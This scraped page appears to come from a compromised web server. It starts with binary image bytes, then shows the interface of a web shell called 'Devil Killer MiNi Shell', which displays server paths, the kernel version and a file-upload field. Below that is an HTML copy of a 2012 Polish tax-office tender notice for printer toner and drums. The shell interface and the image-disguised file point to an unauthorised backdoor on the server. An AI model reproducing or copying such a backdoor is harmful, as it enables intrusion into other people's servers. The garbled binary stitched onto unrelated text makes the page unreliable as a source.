JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/476066-N-2012.html

<p class="kh_header"><b>Łódź: Dostawa wkładów barwiących oraz bębnów światłoczułych do drukarek i kserokopiarek na potrzeby Urzędu Skarbowego Łódź-Widzew z siedzibą w Łodzi, przy ul. Papierniczej 7</b><br>
<b>Numer ogłoszenia: 476066 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy Łódź-Widzew , ul. Papiernicza 7, 92-312 Łódź, woj. łódzkie, tel. 042 2750962, faks 042 2750908.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uswidzew.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wkładów barwiących oraz bębnów światłoczułych do drukarek i kserokopiarek na potrzeby Urzędu Skarbowego Łódź-Widzew z siedzibą w Łodzi, przy ul. Papierniczej 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są dostawy: 
1) Oryginalnych tonerów i taśm barwiących oraz bębnów światłoczułych
do drukarek - część 1,
2) Zastępczych lub regenerowanych tonerów i tuszów do drukarek - 	część 2,
3) Oryginalnych tonerów i tuszów do kserokopiarek - część 3
zwanych dalej wkładami barwiącymi lub materiałami  eksploatacyjnymi, 
2.Zamawiający dopuszcza złożenie jednej oferty na wszystkie części zamówienia oraz składanie ofert częściowych, tzn. na poszczególne części zamówienia ( 1,2,3 ).
3.Słownik określeń użytych w SIWZ.
1) Pod pojęciem oryginalne należy rozumieć materiały eksploatacyjne
wyprodukowane przez producenta urządzenia dla którego są dedykowane
i opatrzone jego zastrzeżonym znakiem towarowym.
2) Pod pojęciem fabrycznie nowe należy rozumieć materiały eksploatacyjne
nieużywane i nieuszkodzone, wolne od wad technicznych i prawnych, dopuszczone
do obrotu, gatunku pierwszego, pełnowartościowe, w oryginalnych opakowaniach
fabrycznych ( z logo producenta, datą ważności i wykazem urządzeń, do których są
przeznaczone ).
3)Pod pojęciem zastępcze należy rozumieć materiały eksploatacyjne równoważne wobec oryginalnych, kompatybilne ze sprzętem, do którego są oferowane, o parametrach i standardach jakościowych zbliżonych do oryginalnych.
4) Pod pojęciem regenerowane  należy rozumieć pełnowartościowe materiały
eksploatacyjne, które po poddaniu zabiegom renowacyjnym, zostały powtórnie
napełnione środkiem barwiącym. W przypadku tonerów do drukarek laserowych
renowacja musi uwzględniać co najmniej: wymianę/regenerację wałka, wymianę
listwy rozprowadzającej, uszczelniaczy i listwy zbierającej, czyszczenie restonera. 
4. Szczegółowy opis przedmiotu zamówienia.
Część 1 -  Dostawy oryginalnych tonerów i taśm barwiących oraz bębnów światłoczułych do drukarek 
1) Przedmiotem zamówienia są dostawy oryginalnych, fabrycznie nowych materiałów
eksploatacyjnych.
2) Zamawiający nie dopuszcza materiałów zastępczych, z uwagi na zapisy warunków
gwarancji producenta urządzeń do których są one przeznaczone, skutkujące utratą
gwarancji w przypadku stosowania nieoryginalnych materiałów eksploatacyjnych.
3) Zamawiający nie dopuszcza przejmowania warunków gwarancji, o której mowa
powyżej, przez Wykonawcę oferującego materiały zastępcze. 
1. OKI B 410dn - toner Nr 43979102 ( 3 500 stron ) - 10 szt., bęben światłoczuły
Nr 43979002 ( 25 000 stron )	- 4 szt.
2. OKI B 411dn - toner Nr 44574702 ( 3 000 stron ) - 5 szt., bęben światłoczuły
Nr 44574302 ( 23 000 stron ) - 2 szt., 
3. OKI B 4350 - toner Nr 01101202 ( 6 000 stron ) - 10 szt.,  bęben światłoczuły
Nr 42102802 ( 25 000 stron )	- 5 szt.
4. OKI B 4400 /OKI B 4600 - toner Nr 43502302 ( 3 000 stron ) - 5 szt.,
bęben światłoczuły Nr  43501902 ( 20 000 stron ) - 4 szt.
5. OKI C 5300 n	Nr  42403002 Rainbow Kit( 4 x 5 000 stron ) - 1 szt.,
bęben światłoczuły Nr 42126605 ( 17 000 stron ) - 1 szt., bęben światłoczuły
Nr 42126606 ( 17 000 stron )- 1 szt., bęben światłoczuły Nr 42126607
( 17 000 stron ) - 1 szt., bęben światłoczuły Nr 42126608 ( 17 000 stron ) - 1 szt.
6. OKI ES 5460- toner Nr 43865729 ( 6 000 stron ) - 2 szt., toner Nr 43865730
( 6 000 stron ) - 2 szt., toner Nr 43865731 ( 6 000 stron ) - 2 szt., toner Nr 43865732 ( 8 000 stron ) - 2 szt.,  bęben światłoczuły Nr 1229301 ( 20 000 stron ) - 2 szt.,  bęben światłoczuły Nr 1229302 ( 20 000 stron ) - 2 szt.,  bęben światłoczuły
Nr 1229303 ( 20 000 stron ) - 2 szt.,  bęben światłoczuły Nr 1229304 ( 20 000 stron ) - 2 szt., 
7. OKI B 6200 / B 6250dn - toner Nr 09004078 ( 11 000 stron )- 25 szt., 
8. OKI B 6300dn - toner Nr 09004079 ( 17 000 stron )- 180 szt., 
9. OKI B 710 / 720 - toner Nr 01279001 ( 15 000 stron ) - 100 szt., 
10. OKI C 830 -toner Nr 44059105 ( 8 000 stron ) - 4 szt.,  toner Nr 44059106
( 8 000 stron ) - 4 szt.,  toner Nr 44059107 ( 8 000 stron ) - 4 szt.,  toner Nr 44059108 ( 8 000 stron )- 4 szt.,  bęben światłoczuły Nr 44064009 ( 20 000 stron ) - 2 szt.,  bęben światłoczuły Nr 44064010 ( 20 000 stron ) - 2 szt., bęben światłoczuły
Nr 44064011 ( 20 000 stron )- 2 szt.,  bęben światłoczuły Nr 44064012 ( 20 000 stron ) - 2 szt., 
11. OKI MICROLINE 3321 kaseta z taśmą barwiącą Nr 09002303 ( 3 mln znaków ) - 	50 szt., 
12. HP LJ 1200- toner C7115X ( 3 500 stron )- 5 szt., 
13. HP P3015- toner CE 255X ( 12 500 stron )- 20 szt., 
14. HP LJ 4515x- toner CC364X ( 24 000 stron )	- 15 szt.,
15. Tally T 2155	kaseta z taśmą barwiącą  Nr 062471 ( 20 mln znaków )- 10 szt., 


Część 2 - Dostawy zastępczych lub regenerowanych tonerów i tuszów do drukarek

1) Przedmiotem zamówienia są dostawy zastępczych lub regenerowanych wkładów
barwiących, fabrycznie nowych, odpowiadających wkładom wyszczególnionym  niżej.
2) Oferowane wkłady barwiące muszą spełniać warunek bezkonfliktowej pracy z danym
urządzeniem, w stopniu nie mniejszym niż wskazany z symbolu oryginał.
3) Oferowane wkłady barwiące powinny posiadać testy wydajności wg normy ISO 19752 dla tonerów monochromatycznych i normy ISO 24711 dla wkładów atramentowych, potwierdzające, że ich jakość i wydajność, jest nie gorsza niż ta, która gwarantuje wymieniony w tabeli produkt oryginalny.
1. HP 5L/6L/LJ 3150 - HP C3906A ( 2 500 stron )- 2 szt.,
2. HP LJ 1100- HP C4092A  ( 2 500 stron ) - 10 szt., 
3. HP P 3015- CE 255X ( 12 500 stron )- 20 szt., 
4. HP LJ 4050 - HP C4127X   ( 10 000 stron )- 10 szt., 
5. HP LJ 4100 - HP C8061X  ( 10 000 stron )- 10 szt., 
6. HP LJ 4515x- CC364X ( 24 000 stron )	- 8 szt., 
7. HP 460 CB- HP 338 C8765EE  ( 450 stron )- 15 szt., 
8. HP P 2055 - CE505X  ( 6500 stron )- 10 szt.	
9. LEXMARK OPTRA T 620- Nr 12A6765 ( 30 000 stron ) - 5 szt.,
10. OKI B 6100- Nr 09004058 ( 15 000 stron )- 10 szt.

Część 3 -  Dostawy oryginalnych tonerów i tuszów do kserokopiarek

1) Przedmiotem zamówienia są dostawy oryginalnych, fabrycznie nowych materiałów
eksploatacyjnych do kserokopiarek wyszczególnionych niżej.
2) Zamawiający nie dopuszcza materiałów zastępczych, z uwagi na zapisy warunków
gwarancji producenta urządzeń do których są one przeznaczone, skutkujące utratą
gwarancji w przypadku stosowania nie oryginalnych materiałów eksploatacyjnych.
3) Zamawiający nie dopuszcza przejmowania warunków gwarancji, o której mowa
powyżej, przez Wykonawcę oferującego materiały zastępcze. 

1. RICOH  VT 3500- VT 1000  ( 1000 ml )	- 4 szt., 
2. KYOCERA - MITA KM - 1530,  KYOCERA - MITA   KM - 2030 - 	Kit KM 1530/2030
( 11 000 stron ) - 50 szt., 
3. KYOCERA - MITA Vi - 310 L - Kit Vi 230/230L/310/310L  ( 10 000 stron )- 2 szt., 
4. KYOCERA - MITA KM 1510	 - Kit KM 1305/1510/1810  ( 7 000 stron )	 - 4 szt., 
5. KYOCERA - MITA KM - 2530, KYOCERA - MITA KM - 3035 - Kit KM 2530/3530/4030/3035/4035/5035  ( 34 000 stron )- 6 szt., 
6. KYOCERA - MITA DC - 1460 - Kit DC 1460/1470 ( 7 000 stron )	- 8 szt., 
7. KYOCERA - MITA TASKalfa 180	- TK - 435  ( 15 000 stron )	- 16 szt., 
8. KYOCERA - MITA FS-1028 MFP	- TK - 130  ( 7 200 stron )	- 6 szt.

5. Zamawiający zastrzega sobie prawo realizowania zamówienia w ilościach
asortymentowych uzależnionych od rzeczywistych potrzeb. 
Ilości podane w tabelach zamieszczonych w pkt. 4 oraz Szczegółowych kosztorysach
ofertowych, stanowiących załączniki 1 a, 1 b, 1 c do SIWZ, są wielkościami
prognozowanymi i mogą być zmniejszane lub zwiększane między poszczególnymi
pozycjami.
6. Wykonawcy nie będzie przysługiwać roszczenie wykonania zamówienia w pełnej
wysokości.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.23.20-0, 30.12.51.20-8, 30.12.43.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wysokość wadium

1)	Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium.
2)	Wadium dla części 1 zamówienia wynosi 7 000,00 PLN ( siedem tysięcy złotych
00 100 ).
3)	Dla pozostałych części zamówienia (część 2 oraz część 3 zamówienia)
Zamawiający nie wymaga wniesienia wadium. 

2. Forma wadium

1)	Wadium może być wniesione w następujących formach:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy
oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze
poręczeniem pieniężnym,
c)	gwarancjach bankowych, 
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b
ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji
Rozwoju Przedsiębiorczości ( t. j. Dz. U. z 2007r., Nr 42, poz. 275
z późn. zm. ).

	2)	W przypadku składania przez Wykonawcę wadium w formie
	gwarancji, gwarancja musi być bezwarunkowa, nieodwołalna i płatna na pierwsze żądanie. Musi być wykonalna na terytorium Rzeczypospolitej Polskiej,
sporządzona  zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie ( Wykonawcy ), beneficjenta gwarancji 
( Zamawiającego ), gwaranta ( banku lub instytucji ubezpieczeniowej
udzielających gwarancji ) oraz wskazanie ich siedzib ( Wykonawcy,
Zamawiającego, banku lub instytucji ubezpieczeniowej udzielających
gwarancji ).

	W przypadku wykonawców wspólnie ubiegających się o udzielenie
zamówienia publicznego zaleca się, by w treści gwarancji jako
Wykonawcę wskazać nazwy wszystkich członków podmiotu wspólnego
z zaznaczeniem, że działają oni jako podmiot wspólny,
np. poprzez następujący zapis:
Zostaliśmy poinformowani, że w związku z organizowanym przez Urząd
Skarbowy Łódź - Widzew postępowaniem o zamówienie publiczne,
którego przedmiotem są dostawy wkładów barwiących oraz bębnów
światłoczułych do drukarek i kserokopiarek, na potrzeby Urzędu
Skarbowego Łódź - Widzew z siedzibą w Łodzi, w którym na mocy
swojej oferty uczestniczą  tu należy wymienić wszystkich
Wykonawców wspólnie ubiegających się o udzielenie zamówienia
( zwani łącznie Wykonawcą), wymagane jest wniesienie wadium dla
części 1 zamówienia w wysokości 7 000,00 PLN
		b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
		c)	kwotę gwarancji,
		d)	termin ważności gwarancji ( nie krótszy niż termin związania ofertą ),
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze
pisemne żądanie Zamawiającego zawierające oświadczenie,
iż Wykonawca, którego ofertę wybrano:
-	odmówił podpisania umowy w sprawie zamówienia publicznego
na warunkach określonych w ofercie, 
-	zawarcie umowy w sprawie zamówienia publicznego stało się
niemożliwe z przyczyn leżących po stronie Wykonawcy,
f)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze
pisemne żądanie Zamawiającego zawierające oświadczenie, iż
Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3
u. p. z. p. nie złożył dokumentów lub oświadczeń, o których mowa
w art. 25 ust. 1 u. p. z. p. lub pełnomocnictw, chyba że udowodni,
że wynika to z przyczyn nieleżących po jego stronie. 

3)	W przypadku składania przez Wykonawcę wadium w formie
	poręczenia, poręczenie musi być sporządzone zgodnie z obowiązującym prawem
i musi zawierać następujące elementy:
a)	wskazanie podmiotu, za który poręczyciel dokonuje poręczenia,
W przypadku Wykonawców wspólnie ubiegających się o udzielenie
zamówienia, zaleca się by w treści poręczenia, jako Wykonawcę
( podmiot, za który poręczyciel dokonuje poręczenia ) wskazać wszystkich
Wykonawców wspólnie ubiegających się o udzielenie zamówienia -
w sposób analogiczny jak opisany przykładowo powyżej, w pkt.  2 2) a).
b)	precyzyjne wskazanie zobowiązania będącego przedmiotem poręczenia,
c)	kwotę, do wysokości której poręczyciel będzie zobowiązany,
d)	wskazanie terminu, z którego upływem wygasa zobowiązanie, przy czym
poręczenie o charakterze terminowym nie może zostać odwołane, 
e)	jak również musi zawierać w swej treści elementy, o których mowa
w pkt.  2 2) lit. e - f.

3. Miejsce i sposób wniesienia wadium:

1)	Wadium wniesione w pieniądzu należy wpłacić na rachunek bankowy
Zamawiającego w banku - Bank NBP O/Okręgowy nr konta 77 1010 1371 0000 9713 9120 0000.
Przy wniesieniu wadium przelewem, w poleceniu przelewu należy podać nazwę
przetargu, oraz wskazać nr rachunku bankowego, na który należy dokonać zwrotu
wadium.

2)	W przypadku wadium składanego w formie innej niż pieniężna (gwarancja
bankowa, gwarancja ubezpieczeniowa), Zamawiający wymaga aby złożone
dokumenty miały postać oryginału. Wykonawca winien złożyć dokument,
o którym mowa powyżej wraz z ofertą, jednakże w osobnej kopercie co umożliwi
jego zdeponowanie i przechowywanie bez konieczności zdekompletowania
oferty.

4. Termin wniesienia wadium.

Wadium należy wnieść przed upływem terminu składania ofert. Przy czym wniesienie
wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za
skuteczne tylko wówczas, gdy znajdą się one na rachunku Zamawiającego przed
upływem terminu składania ofert. 

5. Zwrot wadium

1)	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze
oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem
Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
2)	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza,
Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie
zamówienia publicznego.
3)	Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który
wycofa  ofertę  przed  upływem terminu  składania oferty.
4)	Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono
przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji
bankowej za przelew pieniędzy na rachunek bankowy wskazany przez
Wykonawcę.

6.	Utrata wadium	
	
Zamawiający oświadcza, że zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca,
którego oferta została wybrana:
1)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie, 
2)	zawarcie umowy w sprawie zamówienia publicznego stanie się niemożliwe
z przyczyn leżących po stronie Wykonawcy,
3)	Zamawiający zatrzyma również wadium wraz z odsetkami, jeżeli wykonawca
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 u. p. z. p., nie złożył
dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 u. p. z. p.
lub pełnomocnictw, chyba że Wykonawca udowodni, że wynika to z przyczyn
nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. III.4.2: aktualny odpis z właściwego rejestru..., aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego.., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Terminy stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uswidzew.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy Łódź - Widzew ul. Papiernicza 7 92 - 312 Łódź, pok. nr 406.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 10:00, miejsce: Urząd Skarbowy Łódź - Widzew ul. Papiernicza 7 92 - 312 Łódź, pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.01.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy oryginalnych tonerów i taśm barwiących oraz bębnów światłoczułych do drukarek.</p>
